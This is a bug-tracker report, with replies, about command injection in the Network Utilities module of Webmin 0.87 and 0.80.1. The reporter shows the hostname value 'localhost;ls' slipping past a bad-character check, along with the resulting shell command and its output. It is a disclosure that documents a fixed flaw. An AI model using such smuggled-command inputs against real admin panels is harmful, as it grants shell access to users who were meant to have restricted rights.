Menu

#129 Security: run any shell command from gui

0.86
closed
5
2002-12-20
2001-07-25
Anonymous
No

In webmin 0.87 (and earlier no doubt) on my Mandrake
7.2 box (all operating systems probably), under

'Networking', 'Network Utilities'

there is a 'handy ping, traceroute, nmap etc.' window.

The hostname input is validated by the standard 'bad
character' check, which complains (in large red text)
if I enter a ';', but the text is passed to shell
anyway.

I entered 'localhost;ls' as the hostname and clicked
'Ping', here's the output...
-------------------------------------

[ Network Utilities 0.80.1 ]

Running the ping

Host name localhost;ls contains bad characters. Please
correct and try again.

ping -c 5 -s 56 localhost;ls 2>&1
PING localhost (127.0.0.1): 56 octets data
64 octets from 127.0.0.1: icmp_seq=0 ttl=255 time=0.1
ms
64 octets from 127.0.0.1: icmp_seq=1 ttl=255 time=0.1
ms
64 octets from 127.0.0.1: icmp_seq=2 ttl=255 time=0.1
ms
64 octets from 127.0.0.1: icmp_seq=3 ttl=255 time=0.1
ms
64 octets from 127.0.0.1: icmp_seq=4 ttl=255 time=0.1
ms

--- localhost ping statistics ---
5 packets transmitted, 5 packets received, 0% packet
loss
round-trip min/avg/max = 0.1/0.1/0.1 ms
CHANGES
COPYING
acl_security.pl
config
config.info
defaultacl
dig.cgi
help
images
index.cgi
ipsc-lib.pl
ipsc.cgi
lang
lookup.cgi
module.info
nettools-lib.pl
nmap.cgi
ping.cgi
traceroute.cgi
whois.cgi

---------------
Not so good.

I assume a simple logic error allowed the command to
run despite the check failing. I hope its not a
cut-and-paster to other places in the code - I haven't
looked....

This is a big issue if you allow webmin access to users
who shouldn't have shell access (its not an issue if
you've given them telnet,ssh or 'command' access in
webmin). Samples include operators and help desk type
users who typically have a restricted set of functions
made available...

Cris

Discussion

  • Jamie Cameron

    Jamie Cameron - 2002-12-20

    Logged In: YES
    user_id=129364

    I have forwarded this bug to the developer of the module,
    which is not a core part of webmin ..

     
  • Jamie Cameron

    Jamie Cameron - 2002-12-20
    • status: open --> closed
     
  • Tim Niemueller

    Tim Niemueller - 2003-02-12

    Logged In: YES
    user_id=55951

    The answer is the output. it is version 0.80.1 but current
    is 0.88.1 (and soon another one, which I'm working on). This
    bug has been fixed years ago (truely years!) so please
    upgrade and report the owner of the page you found an
    outdated link on that they should update their webpage.
    Nettools was the first third party module and a lot of old
    links are floating around...

     

Log in to post a comment.